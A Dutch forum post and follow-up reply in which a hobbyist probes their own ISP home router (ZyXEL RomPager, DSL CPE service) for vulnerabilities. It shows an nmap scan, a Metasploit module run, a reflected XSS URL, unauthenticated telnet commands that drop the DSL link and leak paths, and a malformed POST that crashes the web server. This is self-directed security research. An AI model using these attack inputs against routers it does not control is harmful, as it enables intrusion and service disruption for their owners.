Extra debug feature?

  • 27 april 2014
  • 1 reactie
  • 1391 keer bekeken

Speciaal omdat ik vandaag geen ** te doen had, en steeds maar lees over backdoors in routers op internet...
Ben er bijna zeker van dat er meer aanwezig is, hoe dan ook. Hier zover mijn test@localhost is gekomen,



Firmware version : V3.11(TUE.5)-2_20130819

snmpcheck -t 192.168.1.254

System information
-----------------------------------------------------------------------------------------------

Hostname               : router
Description            : Linux router 2.6.32.32 #22 Mon Aug 19 19:05:56 CST 2013 mips
Uptime system          : 0.00 seconds
Uptime SNMP daemon     : 1 day, 00:58:39.00
Contact                : localhost
Location               : wuxi
Motd                   : -



nmap -p "*" 192.168.1.254

PORT      STATE    SERVICE
21/tcp    open     ftp
23/tcp    filtered telnet
53/tcp    open     domain
80/tcp    open     http
514/tcp   filtered shell
2000/tcp  open     cisco-sccp
2001/tcp  open     dc/tr-064
8080/tcp  open     http-proxy
10000/tcp open     snet-sensor-mgmt
10001/tcp open     scp-config

gSOAP(2.7) SAP mgmt CE

msf > use exploit/multi/sap/sap_mgmt_con_osexec_payload
msf exploit(sap_mgmt_con_osexec_payload) > show options

msf exploit(sap_mgmt_con_osexec_payload) > exploit
Exploit running as background job.
etc...

Port 80 mini_httpd/1.19 19dec 2003 <- beetje oud?

XSS
http://192.168.1.254/alert.cgi?msg=XSS&icon=i_firewall.gif

L​A​N​-​S​i​d​e​ ​D​S​L​ ​C​P​E​
:~# telnet 192.168.1.254 2001
Trying 192.168.1.254...
Connected to 192.168.1.254.
Escape character is '^]'.

DOS local/remote
AutobootLoadFirmware ../../../non-existing.bin
nReturn=0
LOG: DSL up down log: WAN Physical Link Down

Local path exposure
AutobootUsedFirmwareGet
nReturn=0 xdsl_firmware=/lib/firmware/2.6.32.32/xcpe_hw.bin
NotificationScriptExecuteConfigGet
nReturn=0  notify_script=/usr/etc/dsl_api/xdslrc.sh

stop(0)/start(1)/restart(2)/continue(3)
AutobootControlSet 0
nReturn=0

8080
Long Form: RemoteSoapServerSet
Short Form: rsss

Input Parameter
- DSL_char_t serv_addr[1-256] (, -1 : clear server data)

Zyxel romPager
:~# curl -I 192.168.1.254:18888
HTTP/1.1 200 OK

Server: ZyXEL-RomPager/4.34

1 reactie

Updateje

RomPager 4.34 stack/buffer overflow (resultaat in is een crash van de rompager websever, en router zelf)
librompager.so

POST /UE/ProcessForm
~60 karakters trash data (in mijn test een paar nulletjes)

Deze draait waarschijnlijk onder root(helaas niet kunnen nagaan). Wat je dus nodig hebt is een shell met root access zodat je die 4.34 lib kunt scpen naar je lokale bak, met een debugger kunt kijken waar het mis gaat en een exploit ervoor kunt schijven?

Het eenigste goede eraan is dat .. Memory usage omlaag is gegaan (van 67% naar 58%)

Liever geen 0day in je webserver die op een 2.6 kernel draait als root.. Want root exploits everywhere.

Edit2
Ow wacht.. Router is gecracht na een aantal minuten.

Facepalm

CPE
AutobootControlSet 2
nReturn=0

Gaf geen resultaat, power on/off heeft dit opgelost. Het ziet er wel naar uit dat hij genuked was erdoor.

Ow wacht ik zocht voor naar die uri om te kijken of er iemand anders al eens mee bezig was geweest.
Nu blijkt dit dus inderdaad zo te zijn..

http://conference.hitb.org/hitbsecconf2013ams/materials/D2T1%20-%20Peter%20Geissler%20and%20Steven%20Ketelaar%20-%20How%20I%20Met%20Your%20Modem.pdf

Reageer